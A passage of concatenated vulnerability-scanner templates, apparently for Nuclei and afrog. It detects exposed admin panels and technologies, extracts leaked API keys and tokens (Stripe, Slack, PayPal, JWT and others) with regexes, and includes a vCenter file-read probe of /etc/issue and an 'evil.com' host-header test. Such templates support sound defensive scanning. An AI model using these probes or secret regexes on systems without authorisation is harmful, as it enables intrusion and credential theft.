tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | 
regex: 17 | - 'sk_live_[0-9a-z]{32}' -------------------------------------------------------------------------------- /call-break-cms.yaml: -------------------------------------------------------------------------------- 1 | id: call-break-cms 2 | 3 | info: 4 | name: Call Break CMS 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Call Break CMS' 18 | condition: and 19 | -------------------------------------------------------------------------------- /certificate-validation.yaml: -------------------------------------------------------------------------------- 1 | id: improper-certificate-validation 2 | 3 | info: 4 | name: Improper Certificate Validation 5 | author: gaurang 6 | severity: medium 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/SslErrorHandler;->proceed()V" -------------------------------------------------------------------------------- /cockpit-detect.yaml: -------------------------------------------------------------------------------- 1 | id: cockpit-detect 2 | 3 | info: 4 | name: Detect Agentejo Cockpit 5 | author: dwisiswant0 6 | severity: info 7 | tags: tech,cockpit 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/auth/login" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Authenticate Please!" 
17 | -------------------------------------------------------------------------------- /compal.yaml: -------------------------------------------------------------------------------- 1 | id: compal-panel-detect 2 | 3 | info: 4 | name: Compal CH7465LG panel detect 5 | author: fabaff 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/common_page/login.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /couchdb-fauxton.yaml: -------------------------------------------------------------------------------- 1 | id: couchdb-fauxton 2 | 3 | info: 4 | name: Apache CouchDB Fauxton Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,apache,couchdb 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Project Fauxton' 18 | -------------------------------------------------------------------------------- /cx-cloud-login.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-login 2 | 3 | info: 4 | name: CX Cloud 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel,cx 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | - '{{BaseURL}}/cxcum/' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "CX Cloud" 19 | -------------------------------------------------------------------------------- /deadbolt-ransomware.yaml: -------------------------------------------------------------------------------- 1 | id: deadbolt-ransomware 2 | 3 | info: 4 | name: Deadbolt Ransomware Detection 5 | author: pdteam 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT." 
-------------------------------------------------------------------------------- /flink-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: flink-exposure 2 | 3 | info: 4 | name: Apache Flink Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,apache,flink 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Apache Flink Web Dashboard' 18 | -------------------------------------------------------------------------------- /rabbitmq-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: rabbitmq-dashboard 2 | 3 | info: 4 | name: RabbitMQ Dashboard 5 | author: fyoorer 6 | severity: info 7 | tags: panel,rabbitmq 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | matchers: 14 | - type: word 15 | words: 16 | - "RabbitMQ Management" 17 | part: body 18 | -------------------------------------------------------------------------------- /redash-detection.yaml: -------------------------------------------------------------------------------- 1 | id: redash-panel 2 | 3 | info: 4 | name: Redash Panel 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | redirects: true 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Login to Redash' 19 | -------------------------------------------------------------------------------- /bitly-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: bitly-secret-key 2 | 3 | info: 4 | name: Bitly Secret Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,bitly 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'R_[0-9a-f]{32}' 
-------------------------------------------------------------------------------- /kafka-connect-ui.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-connect-ui 2 | 3 | info: 4 | name: Apache Kafka Connect UI Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kafka Connect UI' 18 | -------------------------------------------------------------------------------- /slack-bot-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-bot-token 2 | 3 | info: 4 | name: Slack access token 5 | author: nadino 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "xoxb-[0-9A-Za-z\\-]{51}" -------------------------------------------------------------------------------- /api/newrelic-rest-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-rest-api-key 2 | 3 | info: 4 | name: REST API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRRA-[a-f0-9]{42}' -------------------------------------------------------------------------------- /hadoop-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: hadoop-exposure 2 | 3 | info: 4 | name: Apache Hadoop Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,apache,hadoop 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/dfshealth.html' 13 | matchers: 14 | - type: word 15 | words: 16 | - '' 17 | 
-------------------------------------------------------------------------------- /paypal-braintree-token.yaml: -------------------------------------------------------------------------------- 1 | id: paypal-braintree-token 2 | 3 | info: 4 | name: Paypal Braintree Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file,paypal 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" 17 | -------------------------------------------------------------------------------- /webview-javascript.yaml: -------------------------------------------------------------------------------- 1 | id: webview-javascript-enabled 2 | 3 | info: 4 | name: Webview JavaScript enabled 5 | author: gaurang 6 | severity: info 7 | tags: android,file,javascript 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" 17 | -------------------------------------------------------------------------------- /wordpress/wp-xmlrpc.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xmlrpc.php" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'XML-RPC server accepts POST requests only.' 
17 | -------------------------------------------------------------------------------- /api/newrelic-admin-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-admin-api-key 2 | 3 | info: 4 | name: Admin API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRAA-[a-f0-9]{27}' -------------------------------------------------------------------------------- /git/gitlab-ci.yaml: -------------------------------------------------------------------------------- 1 | id: database-username-and-password 2 | 3 | info: 4 | name: database-username-and-password 5 | author: me 6 | severity: high 7 | tags: github 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.gitlab-ci.yml" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "variables:" 18 | condition: and -------------------------------------------------------------------------------- /kubernetes/kubernetes-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-dashboard 2 | 3 | info: 4 | name: Kubernetes Console Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kubernetes,devops 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Kubernetes Dashboard" 17 | -------------------------------------------------------------------------------- /mantis-detect.yaml: -------------------------------------------------------------------------------- 1 | id: mantis-detect 2 | 3 | info: 4 | name: Mantis portal detection 5 | author: makyotox 6 | severity: info 7 | tags: panel,mantis 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login_page.php" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "MantisBT" 18 | part: body 19 
| -------------------------------------------------------------------------------- /slack-user-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-user-token 2 | 3 | info: 4 | name: Slack User token disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "xoxp-[0-9A-Za-z\\-]{72}" -------------------------------------------------------------------------------- /slack-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: slack-webhook 2 | 3 | info: 4 | name: Slack Webhook 5 | author: gaurang 6 | severity: high 7 | tags: token,file,slack 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" 17 | -------------------------------------------------------------------------------- /x-hacker.yaml: -------------------------------------------------------------------------------- 1 | id: x-hacker 2 | 3 | info: 4 | name: Displays the X-Hacker server header if defined 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | extractors: 14 | - type: regex 15 | part: header 16 | name: x-hacker 17 | regex: 18 | - '(?i)X-Hacker:.*' 19 | -------------------------------------------------------------------------------- /a-fingerprinting/nacos-detect.yaml: -------------------------------------------------------------------------------- 1 | id: nacos-detect 2 | 3 | info: 4 | name: Nacos Detect 5 | author: zan8in 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /nacos/ 14 | follow_redirects: true 15 | expression: response.status == 200 && 
response.body.bcontains(b'Nacos') 16 | expression: r0() -------------------------------------------------------------------------------- /aims-password-mgmt-client.yaml: -------------------------------------------------------------------------------- 1 | id: aims-password-mgmt-client 2 | 3 | info: 4 | name: Aims Password Management Client Detect 5 | author: iamthefrogy 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/aims/ps/" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Avatier Corporation" 18 | -------------------------------------------------------------------------------- /biometric-detect.yaml: -------------------------------------------------------------------------------- 1 | id: biometric-detect 2 | 3 | info: 4 | name: Biometric or Fingerprint detect 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android.permission.USE_FINGERPRINT" 17 | - "android.permission.USE_BIOMETRIC" -------------------------------------------------------------------------------- /kafka-topics-ui.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-topics-ui 2 | 3 | info: 4 | name: Apache Kafka Topics UI Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kafka Topics UI - Browse Kafka Data' 18 | -------------------------------------------------------------------------------- /kronos-workforce-central.yaml: -------------------------------------------------------------------------------- 1 | id: kronos-workforce-central 2 | 3 | info: 4 | name: Kronos Workforce Central Panel 5 | author: emadshanab 6 | severity: info 7 | tags: panel,kronos 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - 
'{{BaseURL}}/wfc/portal' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kronos Workforce Central' 18 | -------------------------------------------------------------------------------- /maian-cart-detect.yaml: -------------------------------------------------------------------------------- 1 | id: maian-cart-detect 2 | 3 | info: 4 | name: Maian Cart Detection 5 | author: pdteam 6 | severity: info 7 | tags: tech,maian 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/favicon.ico" 13 | 14 | matchers: 15 | - type: dsl 16 | dsl: 17 | - "status_code==200 && (\"-498581627\" == mmh3(base64_py(body)))" -------------------------------------------------------------------------------- /newrelic-insights-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-insights-key 2 | 3 | info: 4 | name: Insights Keys Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}' -------------------------------------------------------------------------------- /rocketmq-console-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: rocketmq-console-exposure 2 | 3 | info: 4 | name: Apache RocketMQ Console Exposure 5 | author: pdteam 6 | severity: info 7 | tags: panel,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "RocketMq-console-ng" 18 | -------------------------------------------------------------------------------- /s3-detect.yaml: -------------------------------------------------------------------------------- 1 | id: s3-detect 2 | 3 | info: 4 | name: Detect Amazon-S3 Bucket 5 | author: melbadry9 6 | severity: info 7 | tags: aws,s3,bucket,tech 8 | 9 | requests: 10 | - method: GET 11 | 
path: 12 | - "{{BaseURL}}/%c0" 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" 17 | part: body 18 | -------------------------------------------------------------------------------- /smtp-detection.yaml: -------------------------------------------------------------------------------- 1 | id: smtp-service-detection 2 | 3 | info: 4 | name: SMTP Service Detection 5 | author: pussycat0x 6 | severity: info 7 | tags: network,service,smtp 8 | 9 | network: 10 | - inputs: 11 | - data: "\r\n" 12 | host: 13 | - "{{Hostname}}" 14 | - "{{Host}}:25" 15 | matchers: 16 | - type: word 17 | words: 18 | - "SMTP" 19 | -------------------------------------------------------------------------------- /square-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: square-access-token 2 | 3 | info: 4 | name: Square Access Token 5 | author: gaurang,daffainfo 6 | severity: high 7 | tags: token,file,square 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "EAAAE[a-zA-Z0-9_-]{59}" 17 | - "sq0atp-[0-9A-Za-z\\-_]{22}" 18 | -------------------------------------------------------------------------------- /supervpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: supervpn-detect 2 | 3 | info: 4 | name: SuperVPN panel detect 5 | author: organiccrap 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/login.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Sign In-SuperVPN" 17 | part: body 18 | -------------------------------------------------------------------------------- /webview-universal-access.yaml: -------------------------------------------------------------------------------- 1 | id: webview-universal-access 2 | 3 | info: 4 | name: Webview Universal Access enabled 5 | author: gaurang 6 | severity: medium 7 | tags: 
android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" -------------------------------------------------------------------------------- /X-Host.yaml: -------------------------------------------------------------------------------- 1 | id: x-host 2 | 3 | info: 4 | name: x-host 5 | author: Kabilan S 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | 13 | X-Host: "evil.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "evil.com" 20 | -------------------------------------------------------------------------------- /a-fingerprinting/solarwinds-orion-panel.yaml: -------------------------------------------------------------------------------- 1 | id: solarwinds-orion 2 | 3 | info: 4 | name: SolarWinds Orion Panel 5 | author: puzzlepeaches 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /Orion/Login.aspx 14 | expression: response.status == 200 && response.body.bcontains(b'SolarWinds Orion') 15 | expression: r0() -------------------------------------------------------------------------------- /a-fingerprinting/spring-detect.yaml: -------------------------------------------------------------------------------- 1 | id: spring-detect 2 | 3 | info: 4 | name: Spring detected 5 | author: Adam Crosser 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /error 14 | follow_redirects: true 15 | expression: response.status == 500 && response.body.bcontains(b'"status":999') 16 | expression: r0() -------------------------------------------------------------------------------- /compal-panel.yaml: -------------------------------------------------------------------------------- 1 | id: compal-panel-detect 2 | 3 | info: 4 | name: Compal 
CH7465LG panel detect 5 | author: fabaff 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/common_page/login.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "" 17 | part: body 18 | -------------------------------------------------------------------------------- /easyredir.yaml: -------------------------------------------------------------------------------- 1 | id: easyredir-takeover 2 | 3 | info: 4 | name: easyredir Takeover Detection 5 | author: harish 6 | severity: high 7 | tags: takeover 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "This IP or CNAME is part of EasyRedir's URL redirection edge network." 18 | -------------------------------------------------------------------------------- /firebase-database.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-database 2 | 3 | info: 4 | name: Firebase Database Detect 5 | author: gaurang 6 | severity: info 7 | tags: token,file,firebase 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "[a-z0-9.-]+\\.firebaseio\\.com" 17 | - "[a-z0-9.-]+\\.firebaseapp\\.com" 18 | -------------------------------------------------------------------------------- /solarwinds-orion.yaml: -------------------------------------------------------------------------------- 1 | id: solarwinds-orion 2 | 3 | info: 4 | name: SolarWinds Orion Panel 5 | author: puzzlepeaches 6 | severity: info 7 | tags: panel,solarwinds 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Orion/Login.aspx" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "SolarWinds Orion" 18 | part: body 19 | -------------------------------------------------------------------------------- /sonarqube-login.yaml: -------------------------------------------------------------------------------- 1 | id: sonarqube-login 
2 | 3 | info: 4 | name: SonarQube panel detect 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel,sonarqube 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/sessions/new" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "SonarQube" 18 | part: body 19 | -------------------------------------------------------------------------------- /sql-server-reporting.yaml: -------------------------------------------------------------------------------- 1 | id: sql-server-reporting 2 | 3 | info: 4 | name: Detect Microsoft SQL Server Reporting 5 | author: puzzlepeaches 6 | severity: info 7 | tags: tech,microsoft 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Reports/Pages/Folder.aspx" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Report Manager" 17 | -------------------------------------------------------------------------------- /zipkin-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: zipkin-exposure 2 | 3 | info: 4 | name: Zipkin Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,zipkin 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/zipkin/" 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - "webpackJsonpzipkin-lens" 19 | -------------------------------------------------------------------------------- /basic-cors-flash.yaml: -------------------------------------------------------------------------------- 1 | id: basic-cors-misconfig-flash 2 | 3 | info: 4 | name: Basic CORS misconfiguration exploitable with Flash 5 | author: nadino 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/crossdomain.xml" 12 | matchers: 13 | - type: word 14 | words: 15 | - 'allow-access-from domain="*"' 16 | part: body 17 | -------------------------------------------------------------------------------- /jwt-token.yaml: 
-------------------------------------------------------------------------------- 1 | id: jwt-token 2 | 3 | info: 4 | name: JWT Token Disclosure 5 | author: Ice3man 6 | severity: unknown 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}' -------------------------------------------------------------------------------- /kafka-monitoring.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-monitoring 2 | 3 | info: 4 | name: Apache Kafka Monitor Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '>KafkaMonitor' 18 | - '>Kafka Monitor GUI' 19 | -------------------------------------------------------------------------------- /sonicwall-sslvpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sonicwall-sslvpn-panel 2 | 3 | info: 4 | name: SonicWall Virtual Office SSLVPN Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel,sonicwall 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/cgi-bin/welcome" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Virtual Office" 17 | -------------------------------------------------------------------------------- /stridercd-detection.yaml: -------------------------------------------------------------------------------- 1 | id: stridercd-detection 2 | 3 | info: 4 | name: StriderCD Panel 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel,cicd 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | redirects: true 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "Strider" 19 | 
-------------------------------------------------------------------------------- /stripe-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-secret-key 2 | 3 | info: 4 | name: Stripe Secret Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,stripe 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'sk_(?:live|test)_[0-9a-zA-Z]{24}' 18 | -------------------------------------------------------------------------------- /twitter-secret.yaml: -------------------------------------------------------------------------------- 1 | id: twitter-secret 2 | 3 | info: 4 | name: Twitter Secret 5 | author: gaurang,daffainfo 6 | severity: medium 7 | tags: token,file,twitter 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" 17 | - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" -------------------------------------------------------------------------------- /unauthenticated-lansweeper.yaml: -------------------------------------------------------------------------------- 1 | id: unauthenticated-lansweeper 2 | 3 | info: 4 | name: Unauthenticated Lansweeper Instance 5 | author: divya_mudgal 6 | severity: high 7 | tags: lansweeper,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Default.aspx" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Main page - Lansweeper" -------------------------------------------------------------------------------- /vm/vmware-vcenter-lfi-linux.yaml: -------------------------------------------------------------------------------- 1 | id: vmware-vcenter-lfi-linux 2 | 3 | info: 4 | name: VMware vCenter LFI for Linux appliances 5 | author: PR3R00T 6 | severity: high 7 | tags: vmware,lfi,vcenter 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - 
"{{BaseURL}}/eam/vib?id=/etc/issue" 13 | matchers: 14 | - type: word 15 | words: 16 | - "vCenter Server" 17 | -------------------------------------------------------------------------------- /yopass-panel.yaml: -------------------------------------------------------------------------------- 1 | id: yopass-panel 2 | 3 | info: 4 | name: Yopass Application Exposure 5 | author: Adam Crosser 6 | severity: info 7 | metadata: 8 | shodan-query: title:"Yopass" 9 | tags: panel,yopass 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "<title>Yopass" 20 | -------------------------------------------------------------------------------- /amazon-sns-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-sns-token 2 | 3 | info: 4 | name: Amazon SNS Token Detect 5 | author: TheBinitGhimire 6 | severity: info 7 | tags: file,token,amazon,aws 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | name: amazon-sns-topic 16 | regex: 17 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' 18 | -------------------------------------------------------------------------------- /amazon-sns-topic.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-sns-topic 2 | 3 | info: 4 | name: Amazon SNS Topic Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,amazon 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' -------------------------------------------------------------------------------- /api/strapi-admin-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-admin-exposure 2 | 3 | info: 4 | name: Strapi Admin Dashboard Exposure 5 | author: pdteam 6 | severity: info 7 | 
tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /admin/auth/login HTTP/1.1 14 | Host: {{Hostname}} 15 | matchers: 16 | - type: word 17 | words: 18 | - "<title>Strapi Admin" -------------------------------------------------------------------------------- /api/wsdl-api.yaml: -------------------------------------------------------------------------------- 1 | id: wsdl-api 2 | 3 | info: 4 | name: wsdl-detect 5 | author: jarijaas 6 | severity: info 7 | description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) 8 | tags: exposure,api 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/?wsdl" 14 | matchers: 15 | - type: word 16 | words: 17 | - "wsdl:definitions" -------------------------------------------------------------------------------- /argocd-detect.yaml: -------------------------------------------------------------------------------- 1 | id: argocd-detect 2 | 3 | info: 4 | name: Argo CD Detect 5 | author: Adam Crosser 6 | severity: info 7 | description: Detects the Argo CD website console 8 | tags: tech,argocd 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'Argo CD' -------------------------------------------------------------------------------- /bazarr-login.yaml: -------------------------------------------------------------------------------- 1 | id: bazarr-login-detect 2 | 3 | info: 4 | name: Bazarr Login Detect 5 | author: r3dg33k 6 | severity: info 7 | reference: 8 | - https://www.bazarr.media/ 9 | tags: panel,bazarr,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/login" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - '<title>Bazarr' -------------------------------------------------------------------------------- /exposed-pagespeed-global-admin.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-pagespeed-global-admin 2 | 3 | 
info: 4 | name: Apache PageSpeed Global Admin Dashboard Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/pagespeed_admin/' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Pagespeed Admin" -------------------------------------------------------------------------------- /oauth-access-key.yaml: -------------------------------------------------------------------------------- 1 | id: google-oauth-access-key 2 | 3 | info: 4 | name: Google OAuth Access Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,google 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'ya29\.[0-9A-Za-z\-_]+' 19 | -------------------------------------------------------------------------------- /parallels-html-client.yaml: -------------------------------------------------------------------------------- 1 | id: parallels-html-client 2 | 3 | info: 4 | name: Parallels HTML5 Client 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/RASHTML5Gateway/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Parallels HTML5 Client" 17 | part: body 18 | -------------------------------------------------------------------------------- /urge-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: surge-takeover 2 | 3 | info: 4 | name: surge takeover detection 5 | author: pdcommunity 6 | severity: high 7 | 